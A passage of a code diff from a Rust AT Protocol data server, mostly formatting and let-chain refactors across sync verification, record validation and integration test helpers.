if let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) {
295
+
if let Some(commit_bytes) = prefetched.get(&commit_cid)
296
+
&& let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) {
281
297
frame.rev = rev;
282
298
}
283
-
}
284
-
if let Some(ref pc) = prev_cid {
285
-
if let Some(prev_bytes) = prefetched.get(pc) {
286
-
if let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) {
299
+
if let Some(ref pc) = prev_cid
300
+
&& let Some(prev_bytes) = prefetched.get(pc)
301
+
&& let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) {
287
302
frame.since = Some(rev);
288
303
}
289
-
}
290
-
}
291
304
let car_bytes = if !all_cids.is_empty() {
292
305
let mut blocks = BTreeMap::new();
293
306
let mut commit_bytes_for_car: Option<Bytes> = None;
+16
-18
src/sync/verify.rs
+16
-18
src/sync/verify.rs
···
1
1
use bytes::Bytes;
2
2
use cid::Cid;
3
+
use jacquard::common::IntoStatic;
3
4
use jacquard::common::types::crypto::PublicKey;
4
5
use jacquard::common::types::did_doc::DidDocument;
5
-
use jacquard::common::IntoStatic;
6
6
use jacquard_repo::commit::Commit;
7
7
use reqwest::Client;
8
8
use std::collections::HashMap;
···
61
61
let root_block = blocks
62
62
.get(root_cid)
63
63
.ok_or_else(|| VerifyError::BlockNotFound(root_cid.to_string()))?;
64
-
let commit = Commit::from_cbor(root_block)
65
-
.map_err(|e| VerifyError::InvalidCommit(e.to_string()))?;
64
+
let commit =
65
+
Commit::from_cbor(root_block).map_err(|e| VerifyError::InvalidCommit(e.to_string()))?;
66
66
let commit_did = commit.did().as_str();
67
67
if commit_did != expected_did {
68
68
return Err(VerifyError::DidMismatch {
···
133
133
}
134
134
135
135
async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
136
-
let domain = did
137
-
.strip_prefix("did:web:")
138
-
.ok_or_else(|| VerifyError::DidResolutionFailed("Invalid did:web format".to_string()))?;
136
+
let domain = did.strip_prefix("did:web:").ok_or_else(|| {
137
+
VerifyError::DidResolutionFailed("Invalid did:web format".to_string())
138
+
})?;
139
139
let domain_decoded = urlencoding::decode(domain)
140
140
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
141
-
let url = if domain_decoded.contains(':') || domain_decoded.contains('/') {
142
-
format!("https://{}/.well-known/did.json", domain_decoded)
143
-
} else {
144
-
format!("https://{}/.well-known/did.json", domain_decoded)
145
-
};
141
+
let url = format!("https://{}/.well-known/did.json", domain_decoded);
146
142
let response = self
147
143
.http_client
148
144
.get(&url)
···
205
201
let mut last_full_key: Vec<u8> = Vec::new();
206
202
for entry in entries {
207
203
if let Ipld::Map(entry_obj) = entry {
208
-
let prefix_len = entry_obj.get("p").and_then(|p| match p {
209
-
Ipld::Integer(i) => Some(*i as usize),
210
-
_ => None,
211
-
}).unwrap_or(0);
204
+
let prefix_len = entry_obj
205
+
.get("p")
206
+
.and_then(|p| match p {
207
+
Ipld::Integer(i) => Some(*i as usize),
208
+
_ => None,
209
+
})
210
+
.unwrap_or(0);
212
211
let key_suffix = entry_obj.get("k").and_then(|k| match k {
213
212
Ipld::Bytes(b) => Some(b.clone()),
214
213
Ipld::String(s) => Some(s.as_bytes().to_vec()),
···
236
235
}
237
236
stack.push(*tree_cid);
238
237
}
239
-
if let Some(Ipld::Link(value_cid)) = entry_obj.get("v") {
240
-
if !blocks.contains_key(value_cid) {
238
+
if let Some(Ipld::Link(value_cid)) = entry_obj.get("v")
239
+
&& !blocks.contains_key(value_cid) {
241
240
warn!(
242
241
"Record block {} referenced in MST not in CAR (may be expected for partial export)",
243
242
value_cid
244
243
);
245
244
}
246
-
}
247
245
}
248
246
}
249
247
}
+44
-24
src/sync/verify_tests.rs
+44
-24
src/sync/verify_tests.rs
···
64
64
let verifier = CarVerifier::new();
65
65
let empty_node = serde_ipld_dagcbor::to_vec(&serde_json::json!({
66
66
"e": []
67
-
})).unwrap();
67
+
}))
68
+
.unwrap();
68
69
let cid = make_cid(&empty_node);
69
70
let mut blocks = HashMap::new();
70
71
blocks.insert(cid, Bytes::from(empty_node));
···
106
107
("p".to_string(), Ipld::Integer(0)),
107
108
("t".to_string(), Ipld::Link(missing_subtree_cid)),
108
109
]));
109
-
let node = Ipld::Map(std::collections::BTreeMap::from([
110
-
("e".to_string(), Ipld::List(vec![entry])),
111
-
]));
110
+
let node = Ipld::Map(std::collections::BTreeMap::from([(
111
+
"e".to_string(),
112
+
Ipld::List(vec![entry]),
113
+
)]));
112
114
let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap();
113
115
let cid = make_cid(&node_bytes);
114
116
let mut blocks = HashMap::new();
···
136
138
("v".to_string(), Ipld::Link(record_cid)),
137
139
("p".to_string(), Ipld::Integer(0)),
138
140
]));
139
-
let node = Ipld::Map(std::collections::BTreeMap::from([
140
-
("e".to_string(), Ipld::List(vec![entry1, entry2])),
141
-
]));
141
+
let node = Ipld::Map(std::collections::BTreeMap::from([(
142
+
"e".to_string(),
143
+
Ipld::List(vec![entry1, entry2]),
144
+
)]));
142
145
let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap();
143
146
let cid = make_cid(&node_bytes);
144
147
let mut blocks = HashMap::new();
···
171
174
("v".to_string(), Ipld::Link(record_cid)),
172
175
("p".to_string(), Ipld::Integer(0)),
173
176
]));
174
-
let node = Ipld::Map(std::collections::BTreeMap::from([
175
-
("e".to_string(), Ipld::List(vec![entry1, entry2, entry3])),
176
-
]));
177
+
let node = Ipld::Map(std::collections::BTreeMap::from([(
178
+
"e".to_string(),
179
+
Ipld::List(vec![entry1, entry2, entry3]),
180
+
)]));
177
181
let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap();
178
182
let cid = make_cid(&node_bytes);
179
183
let mut blocks = HashMap::new();
···
187
191
use ipld_core::ipld::Ipld;
188
192
189
193
let verifier = CarVerifier::new();
190
-
let left_node = Ipld::Map(std::collections::BTreeMap::from([
191
-
("e".to_string(), Ipld::List(vec![])),
192
-
]));
194
+
let left_node = Ipld::Map(std::collections::BTreeMap::from([(
195
+
"e".to_string(),
196
+
Ipld::List(vec![]),
197
+
)]));
193
198
let left_node_bytes = serde_ipld_dagcbor::to_vec(&left_node).unwrap();
194
199
let left_cid = make_cid(&left_node_bytes);
195
200
let root_node = Ipld::Map(std::collections::BTreeMap::from([
···
210
215
let verifier = CarVerifier::new();
211
216
let node = serde_ipld_dagcbor::to_vec(&serde_json::json!({
212
217
"e": []
213
-
})).unwrap();
218
+
}))
219
+
.unwrap();
214
220
let cid = make_cid(&node);
215
221
let mut blocks = HashMap::new();
216
222
blocks.insert(cid, Bytes::from(node));
···
235
241
let verifier = CarVerifier::new();
236
242
let record_cid = make_cid(b"record");
237
243
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
238
-
("k".to_string(), Ipld::Bytes(b"app.bsky.feed.post/abc".to_vec())),
244
+
(
245
+
"k".to_string(),
246
+
Ipld::Bytes(b"app.bsky.feed.post/abc".to_vec()),
247
+
),
239
248
("v".to_string(), Ipld::Link(record_cid)),
240
249
("p".to_string(), Ipld::Integer(0)),
241
250
]));
···
249
258
("v".to_string(), Ipld::Link(record_cid)),
250
259
("p".to_string(), Ipld::Integer(19)),
251
260
]));
252
-
let node = Ipld::Map(std::collections::BTreeMap::from([
253
-
("e".to_string(), Ipld::List(vec![entry1, entry2, entry3])),
254
-
]));
261
+
let node = Ipld::Map(std::collections::BTreeMap::from([(
262
+
"e".to_string(),
263
+
Ipld::List(vec![entry1, entry2, entry3]),
264
+
)]));
255
265
let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap();
256
266
let cid = make_cid(&node_bytes);
257
267
let mut blocks = HashMap::new();
258
268
blocks.insert(cid, Bytes::from(node_bytes));
259
269
let result = verifier.verify_mst_structure(&cid, &blocks);
260
-
assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly");
270
+
assert!(
271
+
result.is_ok(),
272
+
"Prefix-compressed keys should be validated correctly"
273
+
);
261
274
}
262
275
263
276
#[test]
···
267
280
let verifier = CarVerifier::new();
268
281
let record_cid = make_cid(b"record");
269
282
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
270
-
("k".to_string(), Ipld::Bytes(b"app.bsky.feed.post/xyz".to_vec())),
283
+
(
284
+
"k".to_string(),
285
+
Ipld::Bytes(b"app.bsky.feed.post/xyz".to_vec()),
286
+
),
271
287
("v".to_string(), Ipld::Link(record_cid)),
272
288
("p".to_string(), Ipld::Integer(0)),
273
289
]));
···
276
292
("v".to_string(), Ipld::Link(record_cid)),
277
293
("p".to_string(), Ipld::Integer(19)),
278
294
]));
279
-
let node = Ipld::Map(std::collections::BTreeMap::from([
280
-
("e".to_string(), Ipld::List(vec![entry1, entry2])),
281
-
]));
295
+
let node = Ipld::Map(std::collections::BTreeMap::from([(
296
+
"e".to_string(),
297
+
Ipld::List(vec![entry1, entry2]),
298
+
)]));
282
299
let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap();
283
300
let cid = make_cid(&node_bytes);
284
301
let mut blocks = HashMap::new();
285
302
blocks.insert(cid, Bytes::from(node_bytes));
286
303
let result = verifier.verify_mst_structure(&cid, &blocks);
287
-
assert!(result.is_err(), "Unsorted prefix-compressed keys should fail validation");
304
+
assert!(
305
+
result.is_err(),
306
+
"Unsorted prefix-compressed keys should fail validation"
307
+
);
288
308
let err = result.unwrap_err();
289
309
assert!(matches!(err, VerifyError::MstValidationFailed(_)));
290
310
}
+4
-1
src/util.rs
+4
-1
src/util.rs
···
58
58
.ok_or(DbLookupError::NotFound)
59
59
}
60
60
61
-
pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> {
61
+
pub async fn get_user_by_identifier(
62
+
db: &PgPool,
63
+
identifier: &str,
64
+
) -> Result<UserInfo, DbLookupError> {
62
65
sqlx::query_as!(
63
66
UserInfo,
64
67
"SELECT id, did, handle FROM users WHERE did = $1 OR handle = $1",
+89
-52
src/validation/mod.rs
+89
-52
src/validation/mod.rs
···
53
53
record: &Value,
54
54
collection: &str,
55
55
) -> Result<ValidationStatus, ValidationError> {
56
-
let obj = record
57
-
.as_object()
58
-
.ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?;
56
+
let obj = record.as_object().ok_or_else(|| {
57
+
ValidationError::InvalidRecord("Record must be an object".to_string())
58
+
})?;
59
59
let record_type = obj
60
60
.get("$type")
61
61
.and_then(|v| v.as_str())
···
103
103
if grapheme_count > 3000 {
104
104
return Err(ValidationError::InvalidField {
105
105
path: "text".to_string(),
106
-
message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count),
106
+
message: format!(
107
+
"Text exceeds maximum length of 3000 characters (got {})",
108
+
grapheme_count
109
+
),
107
110
});
108
111
}
109
112
}
110
-
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) {
111
-
if langs.len() > 3 {
113
+
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array())
114
+
&& langs.len() > 3 {
112
115
return Err(ValidationError::InvalidField {
113
116
path: "langs".to_string(),
114
117
message: "Maximum 3 languages allowed".to_string(),
115
118
});
116
119
}
117
-
}
118
120
if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
119
121
if tags.len() > 8 {
120
122
return Err(ValidationError::InvalidField {
···
123
125
});
124
126
}
125
127
for (i, tag) in tags.iter().enumerate() {
126
-
if let Some(tag_str) = tag.as_str() {
127
-
if tag_str.len() > 640 {
128
+
if let Some(tag_str) = tag.as_str()
129
+
&& tag_str.len() > 640 {
128
130
return Err(ValidationError::InvalidField {
129
131
path: format!("tags/{}", i),
130
132
message: "Tag exceeds maximum length of 640 bytes".to_string(),
131
133
});
132
134
}
133
-
}
134
135
}
135
136
}
136
137
Ok(())
137
138
}
138
139
139
-
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
140
+
fn validate_profile(
141
+
&self,
142
+
obj: &serde_json::Map<String, Value>,
143
+
) -> Result<(), ValidationError> {
140
144
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
141
145
let grapheme_count = display_name.chars().count();
142
146
if grapheme_count > 640 {
143
147
return Err(ValidationError::InvalidField {
144
148
path: "displayName".to_string(),
145
-
message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count),
149
+
message: format!(
150
+
"Display name exceeds maximum length of 640 characters (got {})",
151
+
grapheme_count
152
+
),
146
153
});
147
154
}
148
155
}
···
151
158
if grapheme_count > 2560 {
152
159
return Err(ValidationError::InvalidField {
153
160
path: "description".to_string(),
154
-
message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count),
161
+
message: format!(
162
+
"Description exceeds maximum length of 2560 characters (got {})",
163
+
grapheme_count
164
+
),
155
165
});
156
166
}
157
167
}
···
187
197
if !obj.contains_key("createdAt") {
188
198
return Err(ValidationError::MissingField("createdAt".to_string()));
189
199
}
190
-
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
191
-
if !subject.starts_with("did:") {
200
+
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str())
201
+
&& !subject.starts_with("did:") {
192
202
return Err(ValidationError::InvalidField {
193
203
path: "subject".to_string(),
194
204
message: "Subject must be a DID".to_string(),
195
205
});
196
206
}
197
-
}
198
207
Ok(())
199
208
}
200
209
···
205
214
if !obj.contains_key("createdAt") {
206
215
return Err(ValidationError::MissingField("createdAt".to_string()));
207
216
}
208
-
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
209
-
if !subject.starts_with("did:") {
217
+
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str())
218
+
&& !subject.starts_with("did:") {
210
219
return Err(ValidationError::InvalidField {
211
220
path: "subject".to_string(),
212
221
message: "Subject must be a DID".to_string(),
213
222
});
214
223
}
215
-
}
216
224
Ok(())
217
225
}
218
226
···
226
234
if !obj.contains_key("createdAt") {
227
235
return Err(ValidationError::MissingField("createdAt".to_string()));
228
236
}
229
-
if let Some(name) = obj.get("name").and_then(|v| v.as_str()) {
230
-
if name.is_empty() || name.len() > 64 {
237
+
if let Some(name) = obj.get("name").and_then(|v| v.as_str())
238
+
&& (name.is_empty() || name.len() > 64) {
231
239
return Err(ValidationError::InvalidField {
232
240
path: "name".to_string(),
233
241
message: "Name must be 1-64 characters".to_string(),
234
242
});
235
243
}
236
-
}
237
244
Ok(())
238
245
}
239
246
240
-
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
247
+
fn validate_list_item(
248
+
&self,
249
+
obj: &serde_json::Map<String, Value>,
250
+
) -> Result<(), ValidationError> {
241
251
if !obj.contains_key("subject") {
242
252
return Err(ValidationError::MissingField("subject".to_string()));
243
253
}
···
250
260
Ok(())
251
261
}
252
262
253
-
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
263
+
fn validate_feed_generator(
264
+
&self,
265
+
obj: &serde_json::Map<String, Value>,
266
+
) -> Result<(), ValidationError> {
254
267
if !obj.contains_key("did") {
255
268
return Err(ValidationError::MissingField("did".to_string()));
256
269
}
···
260
273
if !obj.contains_key("createdAt") {
261
274
return Err(ValidationError::MissingField("createdAt".to_string()));
262
275
}
263
-
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
264
-
if display_name.is_empty() || display_name.len() > 240 {
276
+
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str())
277
+
&& (display_name.is_empty() || display_name.len() > 240) {
265
278
return Err(ValidationError::InvalidField {
266
279
path: "displayName".to_string(),
267
280
message: "displayName must be 1-240 characters".to_string(),
268
281
});
269
282
}
270
-
}
271
283
Ok(())
272
284
}
273
285
274
-
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
286
+
fn validate_threadgate(
287
+
&self,
288
+
obj: &serde_json::Map<String, Value>,
289
+
) -> Result<(), ValidationError> {
275
290
if !obj.contains_key("post") {
276
291
return Err(ValidationError::MissingField("post".to_string()));
277
292
}
···
281
296
Ok(())
282
297
}
283
298
284
-
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
299
+
fn validate_labeler_service(
300
+
&self,
301
+
obj: &serde_json::Map<String, Value>,
302
+
) -> Result<(), ValidationError> {
285
303
if !obj.contains_key("policies") {
286
304
return Err(ValidationError::MissingField("policies".to_string()));
287
305
}
···
291
309
Ok(())
292
310
}
293
311
294
-
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
295
-
let obj = value
296
-
.and_then(|v| v.as_object())
297
-
.ok_or_else(|| ValidationError::InvalidField {
298
-
path: path.to_string(),
299
-
message: "Must be a strong reference object".to_string(),
300
-
})?;
312
+
fn validate_strong_ref(
313
+
&self,
314
+
value: Option<&Value>,
315
+
path: &str,
316
+
) -> Result<(), ValidationError> {
317
+
let obj =
318
+
value
319
+
.and_then(|v| v.as_object())
320
+
.ok_or_else(|| ValidationError::InvalidField {
321
+
path: path.to_string(),
322
+
message: "Must be a strong reference object".to_string(),
323
+
})?;
301
324
if !obj.contains_key("uri") {
302
325
return Err(ValidationError::MissingField(format!("{}/uri", path)));
303
326
}
304
327
if !obj.contains_key("cid") {
305
328
return Err(ValidationError::MissingField(format!("{}/cid", path)));
306
329
}
307
-
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) {
308
-
if !uri.starts_with("at://") {
330
+
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str())
331
+
&& !uri.starts_with("at://") {
309
332
return Err(ValidationError::InvalidField {
310
333
path: format!("{}/uri", path),
311
334
message: "URI must be an at:// URI".to_string(),
312
335
});
313
336
}
314
-
}
315
337
Ok(())
316
338
}
317
339
}
···
327
349
328
350
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
329
351
if rkey.is_empty() {
330
-
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
352
+
return Err(ValidationError::InvalidRecord(
353
+
"Record key cannot be empty".to_string(),
354
+
));
331
355
}
332
356
if rkey.len() > 512 {
333
-
return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string()));
357
+
return Err(ValidationError::InvalidRecord(
358
+
"Record key exceeds maximum length of 512".to_string(),
359
+
));
334
360
}
335
361
if rkey == "." || rkey == ".." {
336
-
return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string()));
362
+
return Err(ValidationError::InvalidRecord(
363
+
"Record key cannot be '.' or '..'".to_string(),
364
+
));
337
365
}
338
-
let valid_chars = rkey.chars().all(|c| {
339
-
c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~'
340
-
});
366
+
let valid_chars = rkey
367
+
.chars()
368
+
.all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~');
341
369
if !valid_chars {
342
370
return Err(ValidationError::InvalidRecord(
343
-
"Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')".to_string()
371
+
"Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')"
372
+
.to_string(),
344
373
));
345
374
}
346
375
Ok(())
···
348
377
349
378
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
350
379
if collection.is_empty() {
351
-
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
380
+
return Err(ValidationError::InvalidRecord(
381
+
"Collection NSID cannot be empty".to_string(),
382
+
));
352
383
}
353
384
let parts: Vec<&str> = collection.split('.').collect();
354
385
if parts.len() < 3 {
355
386
return Err(ValidationError::InvalidRecord(
356
-
"Collection NSID must have at least 3 segments".to_string()
387
+
"Collection NSID must have at least 3 segments".to_string(),
357
388
));
358
389
}
359
390
for part in &parts {
360
391
if part.is_empty() {
361
392
return Err(ValidationError::InvalidRecord(
362
-
"Collection NSID segments cannot be empty".to_string()
393
+
"Collection NSID segments cannot be empty".to_string(),
363
394
));
364
395
}
365
396
if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') {
366
397
return Err(ValidationError::InvalidRecord(
367
-
"Collection NSID segments must be alphanumeric or hyphens".to_string()
398
+
"Collection NSID segments must be alphanumeric or hyphens".to_string(),
368
399
));
369
400
}
370
401
}
···
385
416
"createdAt": "2024-01-01T00:00:00.000Z"
386
417
});
387
418
assert_eq!(
388
-
validator.validate(&valid_post, "app.bsky.feed.post").unwrap(),
419
+
validator
420
+
.validate(&valid_post, "app.bsky.feed.post")
421
+
.unwrap(),
389
422
ValidationStatus::Valid
390
423
);
391
424
}
···
397
430
"$type": "app.bsky.feed.post",
398
431
"createdAt": "2024-01-01T00:00:00.000Z"
399
432
});
400
-
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
433
+
assert!(
434
+
validator
435
+
.validate(&invalid_post, "app.bsky.feed.post")
436
+
.is_err()
437
+
);
401
438
}
402
439
403
440
#[test]
+1
-1
tests/actor.rs
+1
-1
tests/actor.rs
+6
-2
tests/admin_email.rs
+6
-2
tests/admin_email.rs
···
1
1
mod common;
2
2
3
3
use reqwest::StatusCode;
4
-
use serde_json::{json, Value};
4
+
use serde_json::{Value, json};
5
5
use sqlx::PgPool;
6
6
7
7
async fn get_pool() -> PgPool {
···
46
46
.await
47
47
.expect("Notification not found");
48
48
assert_eq!(notification.subject.as_deref(), Some("Test Admin Email"));
49
-
assert!(notification.body.contains("Hello, this is a test email from the admin."));
49
+
assert!(
50
+
notification
51
+
.body
52
+
.contains("Hello, this is a test email from the admin.")
53
+
);
50
54
}
51
55
52
56
#[tokio::test]
+6
-1
tests/admin_moderation.rs
+6
-1
tests/admin_moderation.rs
···
176
176
.await
177
177
.expect("Failed to send request");
178
178
let status_body: Value = status_res.json().await.unwrap();
179
-
assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false));
179
+
assert!(
180
+
status_body["takedown"].is_null()
181
+
|| !status_body["takedown"]["applied"]
182
+
.as_bool()
183
+
.unwrap_or(false)
184
+
);
180
185
}
181
186
182
187
#[tokio::test]
+6
-6
tests/appview_integration.rs
+6
-6
tests/appview_integration.rs
···
2
2
3
3
use common::{base_url, client, create_account_and_login};
4
4
use reqwest::StatusCode;
5
-
use serde_json::{json, Value};
5
+
use serde_json::{Value, json};
6
6
7
7
#[tokio::test]
8
8
async fn test_get_author_feed_returns_appview_data() {
···
72
72
.unwrap();
73
73
assert_eq!(res.status(), StatusCode::OK);
74
74
let body: Value = res.json().await.unwrap();
75
-
assert!(body["thread"].is_object(), "Response should have thread object");
75
+
assert!(
76
+
body["thread"].is_object(),
77
+
"Response should have thread object"
78
+
);
76
79
assert_eq!(
77
80
body["thread"]["$type"].as_str(),
78
81
Some("app.bsky.feed.defs#threadViewPost"),
···
117
120
let base = base_url().await;
118
121
let (jwt, _did) = create_account_and_login(&client).await;
119
122
let res = client
120
-
.post(format!(
121
-
"{}/xrpc/app.bsky.notification.registerPush",
122
-
base
123
-
))
123
+
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
124
124
.header("Authorization", format!("Bearer {}", jwt))
125
125
.json(&json!({
126
126
"serviceDid": "did:web:example.com",
+44
-15
tests/common/mod.rs
+44
-15
tests/common/mod.rs
···
50
50
return;
51
51
}
52
52
if std::env::var("XDG_RUNTIME_DIR").is_ok() {
53
-
let _ = std::process::Command::new("podman")
53
+
let _ = std::process::Command::new("podman")
54
54
.args(&["rm", "-f", "--filter", "label=bspds_test=true"])
55
55
.output();
56
56
}
57
57
let _ = std::process::Command::new("docker")
58
-
.args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"])
58
+
.args(&[
59
+
"container",
60
+
"prune",
61
+
"-f",
62
+
"--filter",
63
+
"label=bspds_test=true",
64
+
])
59
65
.output();
60
66
}
61
67
···
103
109
}
104
110
105
111
async fn setup_with_external_infra() -> String {
106
-
let database_url = std::env::var("DATABASE_URL")
107
-
.expect("DATABASE_URL must be set when using external infra");
108
-
let s3_endpoint = std::env::var("S3_ENDPOINT")
109
-
.expect("S3_ENDPOINT must be set when using external infra");
112
+
let database_url =
113
+
std::env::var("DATABASE_URL").expect("DATABASE_URL must be set when using external infra");
114
+
let s3_endpoint =
115
+
std::env::var("S3_ENDPOINT").expect("S3_ENDPOINT must be set when using external infra");
110
116
unsafe {
111
-
std::env::set_var("S3_BUCKET", std::env::var("S3_BUCKET").unwrap_or_else(|_| "test-bucket".to_string()));
112
-
std::env::set_var("AWS_ACCESS_KEY_ID", std::env::var("AWS_ACCESS_KEY_ID").unwrap_or_else(|_| "minioadmin".to_string()));
113
-
std::env::set_var("AWS_SECRET_ACCESS_KEY", std::env::var("AWS_SECRET_ACCESS_KEY").unwrap_or_else(|_| "minioadmin".to_string()));
114
-
std::env::set_var("AWS_REGION", std::env::var("AWS_REGION").unwrap_or_else(|_| "us-east-1".to_string()));
117
+
std::env::set_var(
118
+
"S3_BUCKET",
119
+
std::env::var("S3_BUCKET").unwrap_or_else(|_| "test-bucket".to_string()),
120
+
);
121
+
std::env::set_var(
122
+
"AWS_ACCESS_KEY_ID",
123
+
std::env::var("AWS_ACCESS_KEY_ID").unwrap_or_else(|_| "minioadmin".to_string()),
124
+
);
125
+
std::env::set_var(
126
+
"AWS_SECRET_ACCESS_KEY",
127
+
std::env::var("AWS_SECRET_ACCESS_KEY").unwrap_or_else(|_| "minioadmin".to_string()),
128
+
);
129
+
std::env::set_var(
130
+
"AWS_REGION",
131
+
std::env::var("AWS_REGION").unwrap_or_else(|_| "us-east-1".to_string()),
132
+
);
115
133
std::env::set_var("S3_ENDPOINT", &s3_endpoint);
116
134
}
117
135
let mock_server = MockServer::start().await;
···
189
207
190
208
#[cfg(feature = "external-infra")]
191
209
async fn setup_with_testcontainers() -> String {
192
-
panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT.");
210
+
panic!(
211
+
"Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT."
212
+
);
193
213
}
194
214
195
215
async fn setup_mock_appview(mock_server: &MockServer) {
···
218
238
.set_body_json(json!({
219
239
"feed": [],
220
240
"cursor": null
221
-
}))
241
+
})),
222
242
)
223
243
.mount(mock_server)
224
244
.await;
···
364
384
#[cfg(not(feature = "external-infra"))]
365
385
{
366
386
let container = DB_CONTAINER.get().expect("DB container not initialized");
367
-
let port = container.get_host_port_ipv4(5432).await.expect("Failed to get port");
387
+
let port = container
388
+
.get_host_port_ipv4(5432)
389
+
.await
390
+
.expect("Failed to get port");
368
391
format!("postgres://postgres:postgres@127.0.0.1:{}/postgres", port)
369
392
}
370
393
#[cfg(feature = "external-infra")]
···
404
427
.await
405
428
.expect("confirmSignup request failed");
406
429
assert_eq!(confirm_res.status(), StatusCode::OK, "confirmSignup failed");
407
-
let confirm_body: Value = confirm_res.json().await.expect("Invalid JSON from confirmSignup");
430
+
let confirm_body: Value = confirm_res
431
+
.json()
432
+
.await
433
+
.expect("Invalid JSON from confirmSignup");
408
434
confirm_body["accessJwt"]
409
435
.as_str()
410
436
.expect("No accessJwt in confirmSignup response")
···
543
569
.await
544
570
.expect("confirmSignup request failed");
545
571
if confirm_res.status() == StatusCode::OK {
546
-
let confirm_body: Value = confirm_res.json().await.expect("Invalid JSON from confirmSignup");
572
+
let confirm_body: Value = confirm_res
573
+
.json()
574
+
.await
575
+
.expect("Invalid JSON from confirmSignup");
547
576
let access_jwt = confirm_body["accessJwt"]
548
577
.as_str()
549
578
.expect("No accessJwt in confirmSignup response")
+52
-29
tests/delete_account.rs
+52
-29
tests/delete_account.rs
···
1
1
mod common;
2
2
mod helpers;
3
-
use common::*;
4
3
use chrono::Utc;
4
+
use common::*;
5
5
use reqwest::StatusCode;
6
6
use serde_json::{Value, json};
7
7
use sqlx::PgPool;
···
15
15
.expect("Failed to connect to test database")
16
16
}
17
17
18
-
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) {
18
+
async fn create_verified_account(
19
+
client: &reqwest::Client,
20
+
base_url: &str,
21
+
handle: &str,
22
+
email: &str,
23
+
password: &str,
24
+
) -> (String, String) {
19
25
let res = client
20
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
26
+
.post(format!(
27
+
"{}/xrpc/com.atproto.server.createAccount",
28
+
base_url
29
+
))
21
30
.json(&json!({
22
31
"handle": handle,
23
32
"email": email,
···
53
62
.expect("Failed to request account deletion");
54
63
assert_eq!(request_delete_res.status(), StatusCode::OK);
55
64
let pool = get_pool().await;
56
-
let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did)
57
-
.fetch_one(&pool)
58
-
.await
59
-
.expect("Failed to query deletion token");
65
+
let row = sqlx::query!(
66
+
"SELECT token FROM account_deletion_requests WHERE did = $1",
67
+
did
68
+
)
69
+
.fetch_one(&pool)
70
+
.await
71
+
.expect("Failed to query deletion token");
60
72
let token = row.token;
61
73
let delete_payload = json!({
62
74
"did": did,
···
79
91
.expect("Failed to query user");
80
92
assert!(user_row.is_none(), "User should be deleted from database");
81
93
let session_res = client
82
-
.get(format!(
83
-
"{}/xrpc/com.atproto.server.getSession",
84
-
base_url
85
-
))
94
+
.get(format!("{}/xrpc/com.atproto.server.getSession", base_url))
86
95
.bearer_auth(&jwt)
87
96
.send()
88
97
.await
···
110
119
.expect("Failed to request account deletion");
111
120
assert_eq!(request_delete_res.status(), StatusCode::OK);
112
121
let pool = get_pool().await;
113
-
let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did)
114
-
.fetch_one(&pool)
115
-
.await
116
-
.expect("Failed to query deletion token");
122
+
let row = sqlx::query!(
123
+
"SELECT token FROM account_deletion_requests WHERE did = $1",
124
